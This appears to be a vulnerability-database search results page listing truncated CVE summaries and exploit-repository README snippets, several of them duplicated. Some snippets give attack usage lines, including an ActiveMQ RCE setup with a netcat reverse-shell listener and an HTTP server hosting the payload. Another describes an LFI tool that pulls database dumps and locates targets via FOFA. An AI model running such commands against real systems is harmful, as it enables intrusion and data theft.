64311 matches found
CVE-2026-95831
Crypt::SelfCertificate versions from 1.01 through 1.05 for Perl contains malware which executes Python code from an obfuscated URL. The generatecertificate runs a Python script saved as a certificate file. The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated wi...
CVE-2026-59991
The psd-tools Python package, used for processing Adobe Photoshop PSD files, contains an uncontrolled memory allocation vulnerability in the PSDImage.composite() and PSDImage.numpy() functions. Prior to version 1.17.4 , the software allocated output buffers based on attacker-controlled header geo...
EUVD-2026-84808
psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to 1.17.4, PSDImage.composite and PSDImage.numpy allocated output buffers from attacker-controlled PSD header geometry, including width, height, channels, depth, and per-layer rectangles, before validating those value...
CVE-2026-59991 psd-tools: Uncontrolled memory allocation in psd-tools composite/numpy via crafted PSD geometry
psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to 1.17.4, PSDImage.composite and PSDImage.numpy allocated output buffers from attacker-controlled PSD header geometry, including width, height, channels, depth, and per-layer rectangles, before validating those value...
CVE-2026-59991 psd-tools: Uncontrolled memory allocation in psd-tools composite/numpy via crafted PSD geometry
psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to 1.17.4, PSDImage.composite and PSDImage.numpy allocated output buffers from attacker-controlled PSD header geometry, including width, height, channels, depth, and per-layer rectangles, before validating those value...
CVE-2026-77399 icalendar: Denial of service via unbounded VALARM REPEAT expansion
icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 6.1.0 until 7.2.2, vInt.fromical accepts an attacker-controlled VALARM REPEAT value and applications that request alarm times can eagerly expand it without an application-level limit. Alarms.times and...
CVE-2026-48907
E.L.V CVE Research & Assessment Framework E.L.V — Exploit Loader & Vulnerability Firmware Utilidad de investigación de ciberseguridad para evaluación de vulnerabilidades autorizada. Tabla de Contenidos Descripción General Aviso de Seguridad Importante Información del Proyecto Qué Hace el Script...
Kerberos_CVE-2022-33679
KerberosCVE-2022-33679 依赖 impacket==0.10.0 arc4==0.3.0 用例: CVE-2022-33079.py -h -ts -debug -dc-ip ip address target serverName...
CVE-2023-27997-POC
用法: python3 cve-2022-42475.py rhost rport lhost lport 示例: python3 exploit.py 192.168.106.142 10443 192.168.106.143 9999 免责声明: 本项目仅用于教育和道德测试目的。未经事先相互同意,使用此工具攻击目标是非法的。开发者不承担任何责任,也不对因使用此工具造成的任何滥用或损害负责。...
CVE-2026-95831 Crypt::SelfCertificate versions from 1.01 through 1.05 for Perl contains malware which executes Python code from an obfuscated URL
Crypt::SelfCertificate versions from 1.01 through 1.05 for Perl contains malware which executes Python code from an obfuscated URL. The generatecertificate runs a Python script saved as a certificate file. The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated wi...
CVE-2026-95831
Crypt::SelfCertificate versions from 1.01 through 1.05 for Perl contains malware which executes Python code from an obfuscated URL. The generatecertificate runs a Python script saved as a certificate file. The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated wi...
CVE-2026-77271
MCP Atlassian is a Model Context Protocol MCP server for Atlassian products Confluence and Jira. Prior to 0.22.0, validatesafepath defaults its base directory to os.getcwd, and affected Confluence attachment call sites omit basedir, allowing attacker-selected writes within the working directory...
CVE-2023-46604-RCE
CVE-2023-46604-RCE Apache ActiveMQ 未经身份验证的远程代码执行的 Python 实现 设置与利用 nc -lvnp 4444 - 启动监听器 python3 -m http.server 8080 - 托管包含你 payload 的 poc.xml python3 CVE-2023-46604-RCE.py -i -p -u http://:8080/poc.xml - 启动利用...
CVE-2022-46169
CVE-2022-46169 CVE-2022-46169 python CVE-2022-46169.py tageturl...
CVE-2021-21389
使用说明 1. 通过docker构建易受攻击的wordpress和buddypress环境。 2. 构建并运行mariaDB容器。 3. 让两个容器在同一网络中运行。 例如:docker network create wordpressnetwork docker network connect wordpressnetwork wordpressapp docker network connect wordpressnetwork wordpressdb 4. 通过以下命令执行payload: python3 CVE-2021-21389.py http://localhost:808...
CVE-2026-77271 MCP Atlassian: Incomplete path traversal fix allows intra-CWD module overwrite and RCE (bypass of CVE-2026-27825)
MCP Atlassian is a Model Context Protocol MCP server for Atlassian products Confluence and Jira. Prior to 0.22.0, validatesafepath defaults its base directory to os.getcwd, and affected Confluence attachment call sites omit basedir, allowing attacker-selected writes within the working directory...
EUVD-2026-84629
MCP Atlassian is a Model Context Protocol MCP server for Atlassian products Confluence and Jira. Prior to 0.22.0, validatesafepath defaults its base directory to os.getcwd, and affected Confluence attachment call sites omit basedir, allowing attacker-selected writes within the working directory...
CVE-2026-77271
The MCP Atlassian Model Context Protocol server for Confluence and Jira is vulnerable to a module overwrite flaw prior to version 0.22.0 . The root cause is that the validate_safe_path function defaults its base directory to os.getcwd(), while certain Confluence attachment call sites omit the bas...
thm_steelmountain_CVE-2014-6287
thmsteelmountainCVE-2014-6287 una versión en python3 del exploit escrito para CVE-2014-6287. Útil para completar la sala "Steel Mountain" en TryHackMe.com sin el uso de metasploit...
CVE-2023-34598
CVE-2023-34598 - Gibbon v25.0.0 LFI 漏洞利用工具 该仓库包含一个 Python 脚本,用于识别并利用 Gibbon v25.0.0 中的本地文件包含(LFI)漏洞(CVE-2023-34598)。该脚本可以扫描目标网站是否存在潜在漏洞,如果成功,则下载 SQL 导出文件以供进一步分析。它还提供了一个内置的 FOFA 查询,帮助定位潜在的可利用目标。 概述 名称: CVE-2023-34598.py 目的: 识别并利用 Gibbon v25.0.0 中的本地文件包含(LFI)漏洞。 主要功能: 扫描单个目标 是否存在漏洞。 提取部分数据库导出...